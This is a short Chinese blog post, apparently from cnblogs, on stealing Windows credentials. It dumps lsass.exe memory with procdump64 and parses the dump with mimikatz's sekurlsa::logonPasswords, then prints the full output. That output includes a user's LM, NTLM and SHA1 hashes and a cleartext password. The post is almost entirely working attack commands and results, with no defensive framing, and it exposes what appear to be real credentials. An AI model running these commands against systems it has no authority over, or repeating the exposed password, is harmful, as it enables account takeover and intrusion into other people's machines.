zoukankan      html  css  js  c++  java
  • procdump64+mimikatz获取win用户hash密码

    1.导出lsass.exe

    procdump64.exe -accepteula -ma lsass.exe lsass.dmp

    2.执行mimikatz

    mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

    效果:

      .#####.   mimikatz 2.1.1 (x64) built on Jun 16 2018 18:49:05 - lil!
     .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
     ## /  ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
     ##  / ##       > http://blog.gentilkiwi.com/mimikatz
     '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
      '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/
     
    mimikatz(commandline) # sekurlsa::minidump lsass.dmp
    Switch to MINIDUMP : 'lsass.dmp'
     
    mimikatz(commandline) # sekurlsa::logonPasswords full
    Opening : 'lsass.dmp' file for minidump...
     
    Authentication Id : 0 ; 137859 (00000000:00021a83)
    Session           : Interactive from 1
    User Name         : chenglee
    Domain            : chenglee-PC
    Logon Server      : CHENGLEE-PC
    Logon Time        : 2018/7/25 15:06:35
    SID               : S-1-5-21-452281122-3045282507-3243563612-1000
        msv :  
         [00000003] Primary
         * Username : chenglee
         * Domain   : chenglee-PC
         * LM       : 9cffd5e7eefa14babacbf0b4adf55fde
         * NTLM     : 8d0f8e1a18236379538411a9056799f5
         * SHA1     : 989281f47698b73e026160e842d86bc64c9e3c20
        tspkg :
         * Username : chenglee
         * Domain   : chenglee-PC
         * Password : lizhenghua
        wdigest :  
         * Username : chenglee
         * Domain   : chenglee-PC
         * Password : lizhenghua
        kerberos : 
         * Username : chenglee
         * Domain   : chenglee-PC
         * Password : lizhenghua
        ssp :  
        credman :  
     
    Authentication Id : 0 ; 137821 (00000000:00021a5d)
    Session           : Interactive from 1
    User Name         : chenglee
    Domain            : chenglee-PC
    Logon Server      : CHENGLEE-PC
    Logon Time        : 2018/7/25 15:06:35
    SID               : S-1-5-21-452281122-3045282507-3243563612-1000
        msv :  
         [00000003] Primary
         * Username : chenglee
         * Domain   : chenglee-PC
         * LM       : 9cffd5e7eefa14babacbf0b4adf55fde
         * NTLM     : 8d0f8e1a18236379538411a9056799f5
         * SHA1     : 989281f47698b73e026160e842d86bc64c9e3c20
        tspkg :
         * Username : chenglee
         * Domain   : chenglee-PC
         * Password : lizhenghua
        wdigest :  
         * Username : chenglee
         * Domain   : chenglee-PC
         * Password : lizhenghua
        kerberos : 
         * Username : chenglee
         * Domain   : chenglee-PC
         * Password : lizhenghua
        ssp :  
        credman :  
     
    Authentication Id : 0 ; 997 (00000000:000003e5)
    Session           : Service from 0
    User Name         : LOCAL SERVICE
    Domain            : NT AUTHORITY
    Logon Server      : (null)
    Logon Time        : 2018/7/25 15:06:15
    SID               : S-1-5-19
        msv :  
        tspkg :
        wdigest :  
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos : 
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :  
        credman :  
     
    Authentication Id : 0 ; 996 (00000000:000003e4)
    Session           : Service from 0
    User Name         : CHENGLEE-PC$
    Domain            : WORKGROUP
    Logon Server      : (null)
    Logon Time        : 2018/7/25 15:06:15
    SID               : S-1-5-20
        msv :  
        tspkg :
        wdigest :  
         * Username : CHENGLEE-PC$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos : 
         * Username : chenglee-pc$
         * Domain   : WORKGROUP
         * Password : (null)
        ssp :  
        credman :  
     
    Authentication Id : 0 ; 48630 (00000000:0000bdf6)
    Session           : UndefinedLogonType from 0
    User Name         : (null)
    Domain            : (null)
    Logon Server      : (null)
    Logon Time        : 2018/7/25 15:06:06
    SID               :
        msv :  
        tspkg :
        wdigest :  
        kerberos : 
        ssp :  
        credman :  
     
    Authentication Id : 0 ; 999 (00000000:000003e7)
    Session           : UndefinedLogonType from 0
    User Name         : CHENGLEE-PC$
    Domain            : WORKGROUP
    Logon Server      : (null)
    Logon Time        : 2018/7/25 15:06:05
    SID               : S-1-5-18
        msv :  
        tspkg :
        wdigest :  
         * Username : CHENGLEE-PC$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos : 
         * Username : chenglee-pc$
         * Domain   : WORKGROUP
         * Password : (null)
        ssp :  
        credman :  
     
    mimikatz(commandline) # exit
    Bye!
  • 相关阅读:
    SharePoint服务器场环境安装升级补丁的详细步骤
    备注:常用Js脚本
    XMLHttpRequest对象使用示例
    TroubleShoot: SharePoint管理中心503错误,由于配置问题,无法加载模块 DLLowssvr.dll
    递归获取SharePoint文档库文件夹内的所有文件
    Datatable分页通用方法
    递归绑定树形菜单
    sharepoint发布站点匿名登陆访问不了文档库和表单库的解决办法
    Microsoft Office SharePoint Server 2007的文件目录结构
    Sharepoint母版页的应用
  • 原文地址:https://www.cnblogs.com/-qing-/p/10513011.html
Copyright © 2011-2022 走看看